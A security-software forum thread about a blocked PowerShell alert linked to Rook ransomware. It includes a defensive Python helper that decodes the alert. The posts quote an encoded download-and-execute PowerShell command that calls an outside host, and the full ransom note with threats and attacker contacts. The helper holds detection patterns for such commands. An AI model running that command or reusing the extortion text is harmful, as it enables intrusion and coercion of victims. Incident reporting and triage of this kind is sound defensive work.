Huorong Security Software
Board: Dynamic Defense issue reports

ReadMeRook ransomware behind a "Using PowerShell to execute a suspicious script" alert

#1 (original poster) | Posted 2022-3-14 09:42:50
Protection item: Using PowerShell to execute a suspicious script
Executed file: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Executed command line: "powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
Result: Blocked

Process ID: 6420
Acting process: C:\Windows\nssm.exe
Acting process command line: C:\Windows\nssm.exe
Parent process ID: 916
Parent process: C:\Windows\system32\services.exe
Parent process command line: C:\Windows\system32\services.exe



Virus content (the ransom note left on the machine):
-----------Welcome. Again. --------------------
[+]Whats Happen?[+]

Your files are encrypted,and currently unavailable. You can check it: all files on you computer has expansion Rook.

By the way,everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees?[+]


Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.

To check the file capacity, please send 1 files not larger than 1M to us, and we will prove that we are capable of restoring.

If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data,cause just we have the private key. In practise - time is much more valuable than money.

If we find that a security vendor or law enforcement agency pretends to be you to negotiate with us, we will directly destroy the private key and no longer provide you with decryption services.

You have 3 days to contact us for negotiation. Within 3 days, we will provide a 50% discount. If the discount service is not provided for more than 3 days, the files will be leaked to our onion network. Every more than 3 days will increase the number of leaked files.

We will replace the private key every 15 days and the old private key will be deleted. Please do not contact us if it has been encrypted for more than 15 days, we can do nothing, even if God comes, there is nothing we can do.
Our mail box:
securityrook@privatemail.com

If there is no reply for a long time, please contact the following email address!
securityrook@horsefucker.org
------------------------------------------------------------------------------------------------
!!!DANGER!!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!!!!!!
YOUR PERSONAL ID: [ID removed]

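Added example, not from the post and not Huorong's own code: a small Python triage helper for the alert above. It decodes the -e (EncodedCommand) argument, which PowerShell reads as base64 of UTF-16LE text, flags the IEX plus DownloadString pattern and the nssm.exe-under-services.exe lineage (a service wrapper relaunching the downloader, which is why the alert fires again and again), and pulls out the download URL so it can be blocked. The command line and process paths are copied from the alert; the ALERT_* constants, indicator names and regexes are assumptions of this example.

```python
import base64
import re

# The command line and process lineage exactly as quoted in the alert above.
ALERT_CMDLINE = '"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA=='
ALERT_LINEAGE = {"process": r"C:\Windows\nssm.exe",
                 "parent": r"C:\Windows\system32\services.exe"}

# -EncodedCommand and its common short forms; the argument is base64 of UTF-16LE.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# (indicator name, pattern, which text to test: the raw command line or the decoded script)
INDICATORS = [
    ("execution-policy-bypass", r"(?i)-(?:ep|ex|exec|executionpolicy)\s+bypass", "raw"),
    ("invoke-expression", r"(?i)\b(?:iex|invoke-expression)\b", "decoded"),
    ("remote-download", r"(?i)downloadstring|downloadfile|net\.webclient", "decoded"),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -e/-enc/-EncodedCommand, or None if absent."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage(cmdline, lineage):
    """Decode the command line and return the indicators a defender should act on."""
    decoded = decode_encoded_command(cmdline)
    findings = ["encoded-command"] if decoded is not None else []
    for name, pattern, target in INDICATORS:
        if re.search(pattern, cmdline if target == "raw" else (decoded or "")):
            findings.append(name)
    # nssm.exe is a service wrapper: a service under services.exe that relaunches
    # the downloader on every start explains the "keeps running" reported in the thread.
    if (lineage["process"].lower().endswith("nssm.exe")
            and lineage["parent"].lower().endswith("services.exe")):
        findings.append("service-persistence-nssm")
    urls = re.findall(r"https?://[^\s'\")]+", decoded or "")
    return {"decoded": decoded, "findings": findings, "urls": urls}


if __name__ == "__main__":
    report = triage(ALERT_CMDLINE, ALERT_LINEAGE)
    print("decoded:", report["decoded"])
    print("findings:", ", ".join(report["findings"]))
    print("urls to block:", report["urls"])
```

The decoded script is a one-line downloader that fetches and runs whatever the URL serves, so the URL and the nssm.exe service entry are the two things to remove alongside the blocked PowerShell launch.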
#2 | Posted 2022-3-14 09:44:59
It keeps getting run over and over:
Protection item: Using PowerShell to execute a suspicious script
Executed file: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Executed command line: "powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
Result: Blocked

Process ID: 6420
Acting process: C:\Windows\nssm.exe
Acting process command line: C:\Windows\nssm.exe
Parent process ID: 916
Parent process: C:\Windows\system32\services.exe
Parent process command line: C:\Windows\system32\services.exe
#3 | Posted 2022-3-14 09:46:54
Could you leave your contact details, or add our operations staff on WeChat, so they can look into this for you?

[Attachment: 单人二维码.png (75.22 KB), the staff WeChat QR code]
#4 | Posted 2022-3-16 20:05:06
I got infected too.
#5 | Posted 2022-3-16 20:08:22
Could you export the Huorong security log and upload it here?
#6 | Posted 2022-7-21 15:23:55
Quoting q466533386, posted 2022-3-14 09:44:
    It keeps getting run over and over:
    Protection item: Using PowerShell to execute a suspicious script
    Executed file: C:\Windows\System32\WindowsPowerShell\ ...

Could you leave your contact details, or add our operations staff on WeChat, so they can look into this for you?